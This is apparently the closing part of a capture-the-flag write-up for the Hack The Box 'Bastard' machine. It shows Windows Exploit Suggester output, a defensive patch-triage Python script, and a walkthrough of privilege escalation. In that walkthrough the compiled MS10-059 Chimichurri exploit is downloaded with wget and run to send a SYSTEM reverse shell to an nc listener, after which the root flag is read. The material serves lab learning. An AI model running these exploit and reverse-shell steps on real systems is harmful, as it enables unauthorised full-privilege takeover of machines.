Date: 20101214 CVE: CVE-2010-3338 KB: KB2305420 Title: Vulnerability in Task Scheduler Could Allow Elevation of Privilege Affected product: Windows Server 2008 R2 for x64-based Systems Affected component: Severity: Important Impact: Elevation of Privilege Exploit: n/a
Date: 20130409 CVE: CVE-2013-1294 KB: KB2813170 Title: Vulnerabilities in Windows Kernel Could Allow Elevation of Privilege Affected product: Windows Server 2008 R2 for x64-based Systems Affected component: Severity: Important Impact: Elevation of Privilege Exploit: n/a
Date: 20100810 CVE: CVE-2010-2554 KB: KB982799 Title: Vulnerabilities in the Tracing Feature for Services Could Allow Elevation of Privilege Affected product: Windows Server 2008 R2 for x64-based Systems Affected component: Severity: Important Impact: Elevation of Privilege Exploit: n/a
Date: 20110208 CVE: CVE-2011-0091 KB: KB2425227 Title: Vulnerabilities in Kerberos Could Allow Elevation of Privilege Affected product: Windows Server 2008 R2 for x64-based Systems Affected component: Severity: Important Impact: Elevation of Privilege Exploit: n/a
Date: 20130409 CVE: CVE-2013-1292 KB: KB2840149 Title: Vulnerabilities in Kernel-Mode Driver Could Allow Elevation Of Privilege Affected product: Windows Server 2008 R2 for x64-based Systems Affected component: Severity: Important Impact: Elevation of Privilege Exploit: n/a
Date: 20130409 CVE: CVE-2013-1292 KB: KB2808735 Title: Vulnerabilities in Kernel-Mode Driver Could Allow Elevation Of Privilege Affected product: Windows Server 2008 R2 for x64-based Systems Affected component: Severity: Important Impact: Elevation of Privilege Exploit: n/a
Date: 20130409 CVE: CVE-2013-1291 KB: KB2840149 Title: Vulnerabilities in Kernel-Mode Driver Could Allow Elevation Of Privilege Affected product: Windows Server 2008 R2 for x64-based Systems Affected component: Severity: Important Impact: Elevation of Privilege Exploit: n/a
Date: 20130409 CVE: CVE-2013-1291 KB: KB2808735 Title: Vulnerabilities in Kernel-Mode Driver Could Allow Elevation Of Privilege Affected product: Windows Server 2008 R2 for x64-based Systems Affected component: Severity: Important Impact: Elevation of Privilege Exploit: n/a
Date: 20120612 CVE: CVE-2012-1515 KB: KB2709715 Title: Vulnerabilities in Windows Kernel Could Allow Elevation of Privilege Affected product: Windows Server 2008 R2 for x64-based Systems Affected component: Severity: Important Impact: Elevation of Privilege Exploit: n/a
Date: 20130212 CVE: CVE-2013-0073 KB: KB2789644 Title: Vulnerability in .NET Framework Could Allow Elevation of Privilege Affected product: Windows Server 2008 R2 for x64-based Systems Affected component: Microsoft .NET Framework 3.5.1 Severity: Important Impact: Elevation of Privilege Exploit: n/a
Date: 20130212 CVE: CVE-2013-0076 KB: KB2790113 Title: Vulnerability in Windows Client/Server Run-time Subsystem (CSRSS) Could Allow Elevation of Privilege Affected product: Windows Server 2008 R2 for x64-based Systems Affected component: Severity: Important Impact: Elevation of Privilege Exploit: n/a
Date: 20120214 CVE: CVE-2012-0148 KB: KB2645640 Title: Vulnerabilities in Ancillary Function Driver Could Allow Elevation of Privilege Affected product: Windows Server 2008 R2 for x64-based Systems Affected component: Severity: Important Impact: Elevation of Privilege Exploit: n/a
Date: 20130108 CVE: CVE-2013-0008 KB: KB2778930 Title: Vulnerability in Windows Kernel-Mode Driver Could Allow Elevation of Privilege Affected product: Windows Server 2008 R2 for x64-based Systems Affected component: Severity: Important Impact: Elevation of Privilege Exploit: http://www.exploit-db.com/exploits/24485
Date: 20130108 CVE: CVE-2013-0004 KB: KB2742598 Title: Vulnerabilities in .NET Framework Could Allow Elevation of Privilege Affected product: Windows Server 2008 R2 for x64-based Systems Affected component: Microsoft .NET Framework 3.5.1 Severity: Important Impact: Elevation of Privilege Exploit: n/a
Date: 20130108 CVE: CVE-2013-0004 KB: KB2756920 Title: Vulnerabilities in .NET Framework Could Allow Elevation of Privilege Affected product: Windows Server 2008 R2 for x64-based Systems Affected component: Microsoft .NET Framework 3.5.1 Severity: Important Impact: Elevation of Privilege Exploit: n/a
Date: 20130108 CVE: CVE-2013-0001 KB: KB2742598 Title: Vulnerabilities in .NET Framework Could Allow Elevation of Privilege Affected product: Windows Server 2008 R2 for x64-based Systems Affected component: Microsoft .NET Framework 3.5.1 Severity: Important Impact: Elevation of Privilege Exploit: n/a
Date: 20130108 CVE: CVE-2013-0001 KB: KB2756920 Title: Vulnerabilities in .NET Framework Could Allow Elevation of Privilege Affected product: Windows Server 2008 R2 for x64-based Systems Affected component: Microsoft .NET Framework 3.5.1 Severity: Important Impact: Elevation of Privilege Exploit: n/a
Date: 20130108 CVE: CVE-2013-0002 KB: KB2742598 Title: Vulnerabilities in .NET Framework Could Allow Elevation of Privilege Affected product: Windows Server 2008 R2 for x64-based Systems Affected component: Microsoft .NET Framework 3.5.1 Severity: Important Impact: Elevation of Privilege Exploit: n/a
Date: 20130108 CVE: CVE-2013-0002 KB: KB2756920 Title: Vulnerabilities in .NET Framework Could Allow Elevation of Privilege Affected product: Windows Server 2008 R2 for x64-based Systems Affected component: Microsoft .NET Framework 3.5.1 Severity: Important Impact: Elevation of Privilege Exploit: n/a
Date: 20100810 CVE: CVE-2010-2555 KB: KB982799 Title: Vulnerabilities in the Tracing Feature for Services Could Allow Elevation of Privilege Affected product: Windows Server 2008 R2 for x64-based Systems Affected component: Severity: Important Impact: Elevation of Privilege Exploit: n/a
Date: 20130409 CVE: CVE-2013-1284 KB: KB2813170 Title: Vulnerabilities in Windows Kernel Could Allow Elevation of Privilege Affected product: Windows Server 2008 R2 for x64-based Systems Affected component: Severity: Important Impact: Elevation of Privilege Exploit: n/a
Date: 20130312 CVE: CVE-2013-1285 KB: KB2807986 Title: Vulnerabilities in Kernel-Mode Drivers Could Allow Elevation Of Privilege Affected product: Windows Server 2008 R2 for x64-based Systems Affected component: Severity: Important Impact: Elevation of Privilege Exploit: n/a
Date: 20130312 CVE: CVE-2013-1286 KB: KB2807986 Title: Vulnerabilities in Kernel-Mode Drivers Could Allow Elevation Of Privilege Affected product: Windows Server 2008 R2 for x64-based Systems Affected component: Severity: Important Impact: Elevation of Privilege Exploit: n/a
Date: 20130312 CVE: CVE-2013-1287 KB: KB2807986 Title: Vulnerabilities in Kernel-Mode Drivers Could Allow Elevation Of Privilege Affected product: Windows Server 2008 R2 for x64-based Systems Affected component: Severity: Important Impact: Elevation of Privilege Exploit: n/a
Date: 20130409 CVE: CVE-2013-1283 KB: KB2840149 Title: Vulnerabilities in Kernel-Mode Driver Could Allow Elevation Of Privilege Affected product: Windows Server 2008 R2 for x64-based Systems Affected component: Severity: Important Impact: Elevation of Privilege Exploit: n/a
Date: 20130409 CVE: CVE-2013-1283 KB: KB2808735 Title: Vulnerabilities in Kernel-Mode Driver Could Allow Elevation Of Privilege Affected product: Windows Server 2008 R2 for x64-based Systems Affected component: Severity: Important Impact: Elevation of Privilege Exploit: n/a
Date: 20110208 CVE: CVE-2011-0043 KB: KB2425227 Title: Vulnerabilities in Kerberos Could Allow Elevation of Privilege Affected product: Windows Server 2008 R2 for x64-based Systems Affected component: Severity: Important Impact: Elevation of Privilege Exploit: n/a
Date: 20110208 CVE: CVE-2011-0045 KB: KB2393802 Title: Vulnerabilities in Windows Kernel Could Allow Elevation of Privilege Affected product: Windows Server 2008 R2 for x64-based Systems Affected component: Severity: Important Impact: Elevation of Privilege Exploit: n/a
Date: 20101214 CVE: CVE-2010-3961 KB: KB2442962 Title: Vulnerability in Consent User Interface Could Allow Elevation of Privilege Affected product: Windows Server 2008 R2 for x64-based Systems Affected component: Severity: Important Impact: Elevation of Privilege Exploit: n/a
Date: 20110208 CVE: CVE-2010-4398 KB: KB2393802 Title: Vulnerabilities in Windows Kernel Could Allow Elevation of Privilege Affected product: Windows Server 2008 R2 for x64-based Systems Affected component: Severity: Important Impact: Elevation of Privilege Exploits: http://www.exploit-db.com/bypassing-uac-with-user-privilege-under-windows-vista7-mirror/, http://www.exploit-db.com/exploits/15609/
Date: 20111229 CVE: CVE-2011-3414 KB: KB2656355 Title: Vulnerabilities in .NET Framework Could Allow Elevation of Privilege Affected product: Windows Server 2008 R2 for x64-based Systems Affected component: Microsoft .NET Framework 3.5.1 Severity: Critical Impact: Elevation of Privilege Exploit: n/a
Date: 20111229 CVE: CVE-2011-3417 KB: KB2656355 Title: Vulnerabilities in .NET Framework Could Allow Elevation of Privilege Affected product: Windows Server 2008 R2 for x64-based Systems Affected component: Microsoft .NET Framework 3.5.1 Severity: Critical Impact: Elevation of Privilege Exploit: n/a
Date: 20111229 CVE: CVE-2011-3416 KB: KB2656355 Title: Vulnerabilities in .NET Framework Could Allow Elevation of Privilege Affected product: Windows Server 2008 R2 for x64-based Systems Affected component: Microsoft .NET Framework 3.5.1 Severity: Critical Impact: Elevation of Privilege Exploit: n/a
Date: 20110712 CVE: CVE-2011-1870 KB: KB2507938 Title: Vulnerabilities in Windows Client/Server Run-time Subsystem Could Allow Elevation of Privilege Affected product: Windows Server 2008 R2 for x64-based Systems Affected component: Severity: Important Impact: Elevation of Privilege Exploit: n/a
Date: 20120508 CVE: CVE-2012-0178 KB: KB2690533 Title: Vulnerability in Windows Partition Manager Could Allow Elevation of Privilege Affected product: Windows Server 2008 R2 for x64-based Systems Affected component: Severity: Important Impact: Elevation of Privilege Exploit: n/a
Date: 20110614 CVE: CVE-2011-1264 KB: KB2518295 Title: Vulnerability in Active Directory Certificate Services Web Enrollment Could Allow Elevation of Privilege Affected product: Windows Server 2008 R2 for x64-based Systems Affected component: Severity: Important Impact: Elevation of Privilege Exploit: n/a
Date: 20110809 CVE: CVE-2011-1263 KB: KB2546250 Title: Vulnerability in Remote Desktop Web Access Could Allow Elevation of Privilege Affected product: Windows Server 2008 R2 for x64-based Systems Affected component: Severity: Important Impact: Elevation of Privilege Exploit: n/a
[+] Missing patches: 23
- KB2507938: patches 5 vulnerabilities
- KB2840149: patches 4 vulnerabilities
- KB2742598: patches 4 vulnerabilities
- KB2808735: patches 4 vulnerabilities
- KB2756920: patches 4 vulnerabilities
- KB2807986: patches 3 vulnerabilities
- KB2656355: patches 3 vulnerabilities
- KB2813170: patches 2 vulnerabilities
- KB2393802: patches 2 vulnerabilities
- KB2645640: patches 2 vulnerabilities
- KB982799: patches 2 vulnerabilities
- KB2709715: patches 2 vulnerabilities
- KB2425227: patches 2 vulnerabilities
- KB2790113: patches 1 vulnerability
- KB2442962: patches 1 vulnerability
- KB2518295: patches 1 vulnerability
- KB2789644: patches 1 vulnerability
- KB2620712: patches 1 vulnerability
- KB2778930: patches 1 vulnerability
- KB2305420: patches 1 vulnerability
- KB2690533: patches 1 vulnerability
- KB2546250: patches 1 vulnerability
- KB2571621: patches 1 vulnerability
[+] KB with the most recent release date
- ID: KB2840149
- Release date: 20130409
[+] Done. Displaying 49 of the 207 vulnerabilities found.
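The suggester prints one finding per line, so with 207 of them it is hard to see which missing KBs matter most. The script below is an added example, not part of the original writeup and not code from the Windows Exploit Suggester project: it parses that one-line-per-finding format (assuming the field labels shown above, and that no value contains a label followed by a colon), groups findings by KB and ranks them the way a patch owner would triage them, with KBs that have a public exploit first, then by severity, then by number of CVEs fixed. The four sample findings are copied from the output above; the summary line is included to show that non-finding lines are skipped.

```python
import re
from collections import defaultdict

# Field labels exactly as Windows Exploit Suggester prints them for each
# finding (the entries on this page were flattened onto one line each).
# Assumption: no other text in an entry contains "<label>:".
FIELDS = ["Date", "CVE", "KB", "Title", "Affected product",
          "Affected component", "Severity", "Impact", "Exploits", "Exploit"]
_LABEL = re.compile(r"(?<!\S)(" + "|".join(re.escape(f) for f in FIELDS) + r"):\s*")

# Microsoft bulletin severities, highest rank last.
SEVERITY_RANK = {"Low": 1, "Moderate": 2, "Important": 3, "Critical": 4}


def parse_entry(line):
    """Split one flattened finding into a dict keyed by the suggester's labels.

    The exploit field is normalised to a list of URLs; "n/a" becomes [].
    """
    parts = _LABEL.split(line.strip())   # ['', 'Date', '20101214', 'CVE', ...]
    entry = {label: value.strip() for label, value in zip(parts[1::2], parts[2::2])}
    raw = entry.pop("Exploits", None) or entry.pop("Exploit", "n/a")
    entry.pop("Exploit", None)
    entry["Exploits"] = [] if raw == "n/a" else [u.strip() for u in raw.split(",") if u.strip()]
    return entry


def summarize_by_kb(lines):
    """Group findings by KB and rank them for patch prioritisation.

    Order: KBs with a public exploit first, then highest severity, then the
    number of CVEs fixed. Lines that are not findings ("[+] ..." summaries,
    banner text) are ignored.
    """
    groups = defaultdict(lambda: {"kb": "", "cves": [], "severity": "",
                                  "exploits": [], "latest": "00000000"})
    for line in lines:
        if not line.lstrip().startswith("Date:"):
            continue
        e = parse_entry(line)
        g = groups[e["KB"]]
        g["kb"] = e["KB"]
        g["cves"].append(e["CVE"])
        if SEVERITY_RANK.get(e["Severity"], 0) > SEVERITY_RANK.get(g["severity"], 0):
            g["severity"] = e["Severity"]
        g["exploits"].extend(e["Exploits"])
        g["latest"] = max(g["latest"], e["Date"])   # YYYYMMDD, so string max is correct
    return sorted(groups.values(),
                  key=lambda g: (bool(g["exploits"]),
                                 SEVERITY_RANK.get(g["severity"], 0),
                                 len(g["cves"])),
                  reverse=True)


# Sample input: four findings copied from the suggester output on this page
# plus one summary line, embedded here so the script runs offline.
SAMPLE_OUTPUT = """\
Date: 20101214 CVE: CVE-2010-3961 KB: KB2442962 Title: Vulnerability in Consent User Interface Could Allow Elevation of Privilege Affected product: Windows Server 2008 R2 for x64-based Systems Affected component: Severity: Important Impact: Elevation of Privilege Exploit: n/a
Date: 20110208 CVE: CVE-2010-4398 KB: KB2393802 Title: Vulnerabilities in Windows Kernel Could Allow Elevation of Privilege Affected product: Windows Server 2008 R2 for x64-based Systems Affected component: Severity: Important Impact: Elevation of Privilege Exploits: http://www.exploit-db.com/bypassing-uac-with-user-privilege-under-windows-vista7-mirror/, http://www.exploit-db.com/exploits/15609/
Date: 20111229 CVE: CVE-2011-3414 KB: KB2656355 Title: Vulnerabilities in .NET Framework Could Allow Elevation of Privilege Affected product: Windows Server 2008 R2 for x64-based Systems Affected component: Microsoft .NET Framework 3.5.1 Severity: Critical Impact: Elevation of Privilege Exploit: n/a
Date: 20111229 CVE: CVE-2011-3417 KB: KB2656355 Title: Vulnerabilities in .NET Framework Could Allow Elevation of Privilege Affected product: Windows Server 2008 R2 for x64-based Systems Affected component: Microsoft .NET Framework 3.5.1 Severity: Critical Impact: Elevation of Privilege Exploit: n/a
[+] Done. Displaying 49 of the 207 vulnerabilities found.
"""

if __name__ == "__main__":
    for g in summarize_by_kb(SAMPLE_OUTPUT.splitlines()):
        flag = "PUBLIC EXPLOIT" if g["exploits"] else "no public exploit"
        print(f"{g['kb']}: {g['severity']:<9} {len(g['cves'])} CVE(s)  {flag}  (latest {g['latest']})")
```

Feed it the full suggester output (`python3 triage.py < suggester.txt` with `sys.stdin` in place of `SAMPLE_OUTPUT`) and the first rows are the KBs to schedule first; on this host that ordering puts KB2393802 ahead of the .NET KB even though the latter is rated Critical, because a public exploit is the stronger signal.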
MS10-059
u505@kali:~/HTB/Machines/Bastard$ wget https://github.com/egre55/windows-kernel-exploits/raw/master/MS10-059:%20Chimichurri/Compiled/Chimichurri.exe
--2020-03-14 19:19:53-- https://github.com/egre55/windows-kernel-exploits/raw/master/MS10-059:%20Chimichurri/Compiled/Chimichurri.exe
Resolving github.com (github.com)... 192.30.253.113
Connecting to github.com (github.com)|192.30.253.113|:443... connected.
HTTP request sent, awaiting response... 302 Found
Location: https://raw.githubusercontent.com/egre55/windows-kernel-exploits/master/MS10-059%3A%20Chimichurri/Compiled/Chimichurri.exe [following]
--2020-03-14 19:19:53-- https://raw.githubusercontent.com/egre55/windows-kernel-exploits/master/MS10-059%3A%20Chimichurri/Compiled/Chimichurri.exe
Resolving raw.githubusercontent.com (raw.githubusercontent.com)... 199.232.0.133
Connecting to raw.githubusercontent.com (raw.githubusercontent.com)|199.232.0.133|:443... connected.
HTTP request sent, awaiting response... 200 OK
Length: 784384 (766K) [application/octet-stream]
Saving to: ‘Chimichurri.exe’
Chimichurri.exe 100%[===================>] 766.00K --.-KB/s in 0.09s
2020-03-14 19:19:54 (8.13 MB/s) - ‘Chimichurri.exe’ saved [784384/784384]
u505@kali:~/HTB/Machines/Bastard$ rlwrap nc -lnvp 4445
Ncat: Version 7.80 ( https://nmap.org/ncat )
Ncat: Listening on :::4445
Ncat: Listening on 0.0.0.0:4445
Run the exploit
C:\inetpub\drupal-7.54>Chimichurri.exe 10.10.14.21 4445
Chimichurri.exe 10.10.14.21 4445
/Chimichurri/-->This exploit gives you a Local System shell
/Chimichurri/-->Changing registry values...
/Chimichurri/-->Got SYSTEM token...
/Chimichurri/-->Running reverse shell...
/Chimichurri/-->Restoring default registry values...
The listener receives a reverse shell running as NT AUTHORITY\SYSTEM.
u505@kali:~/HTB/Machines/Bastard$ rlwrap nc -lnvp 4445
Ncat: Version 7.80 ( https://nmap.org/ncat )
Ncat: Listening on :::4445
Ncat: Listening on 0.0.0.0:4445
Ncat: Connection from 10.10.10.9.
Ncat: Connection from 10.10.10.9:49183.
Microsoft Windows [Version 6.1.7600]
Copyright (c) 2009 Microsoft Corporation. All rights reserved.
C:\inetpub\drupal-7.54>whoami
whoami
nt authority\system
Root Flag
C:\inetpub\drupal-7.54>type c:\Users\Administrator\Desktop\root.txt.txt
type c:\Users\Administrator\Desktop\root.txt.txt
<ROOT_FLAG>
References
- DRUPAL 7.X SERVICES MODULE UNSERIALIZE() TO RCE
- What is URL Encoding and How does it work?
- windows-kernel-exploits
- Microsoft Security Bulletin MS10-059 - Important
Daniel Simao 09:27, 11 March 2020 (EDT)